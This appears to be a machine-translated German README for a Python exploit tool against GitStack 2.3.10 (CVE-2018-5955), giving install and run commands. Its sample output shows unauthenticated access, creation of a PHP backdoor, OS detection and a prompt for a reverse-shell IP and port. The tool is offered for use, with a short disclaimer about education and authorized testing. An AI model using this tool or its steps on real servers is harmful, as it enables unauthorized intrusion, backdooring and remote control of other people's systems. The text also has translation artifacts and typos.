Ein Exploit für CVE-2018-5955 GitStack 2.3.10 Nicht authentifizierter RCE
Exploit: Gitstack 2.3.10 Nicht authentifizierte Remote -Code -Ausführung
Datum: 18.01.2018
Software -Link: https://gitstack.com/
Exploit -Autor: Kacper Szurek
Original Exploit: https://www.exploit-db.com/exploits/43777
Website: https://security.szurek.pl/
Kategorie: Remote
CVE: CVE-2018-5955
Datum: 23.06.2023
Neue Funktionen: Interactive RCE, OS -Erkennung, Reverse Shell -Funktion, angepasst von Python2 bis Python3
CVE: CVE-2018-5955
Kategorie: Remote
Ich übernehme keine Verantwortung für Ihre Handlungen, da ich es für Bildungszwecke auf Github oder zertifizierte und autorisierte Penetrationstests veröffentlicht habe
Anforderungen installieren:
pip install colorama
Dann können Sie es mit:
python3 exploit.py
Das Betriebssystem wird erkannt, nachdem Sie das CVE ausgenutzt haben. Tatsächlich wird es diese Ausgabezeile geben: "[*] OS: $ Operatingsystem" (Dimostration unten)
[+] Get user list
[+] Found user twreath
[+] Web repository already enabled
[+] Get repositories list
[+] Found repository Website
[+] Add user to repository
[+] Disable access for anyone
[+] Create backdoor in PHP
[*] Type 'shell' to get a reverse shell
[*] OS : Windows <----
Sie können auch "Betriebssystem" eingeben, um herauszufinden, welche Art von Betriebssystem ist
Um eine tatsächliche Reverse -Shell für das Ziel zu erhalten, können Sie "Shell" eingeben und dann Ihre IP und Ihren Höranschluss wie folgt eingeben:
RCE > shell
[?] Please enter the IP address for the shell: YOUR IP HERE
[?] Please enter the port number for the shell: YOUR LISTEN PORT HERE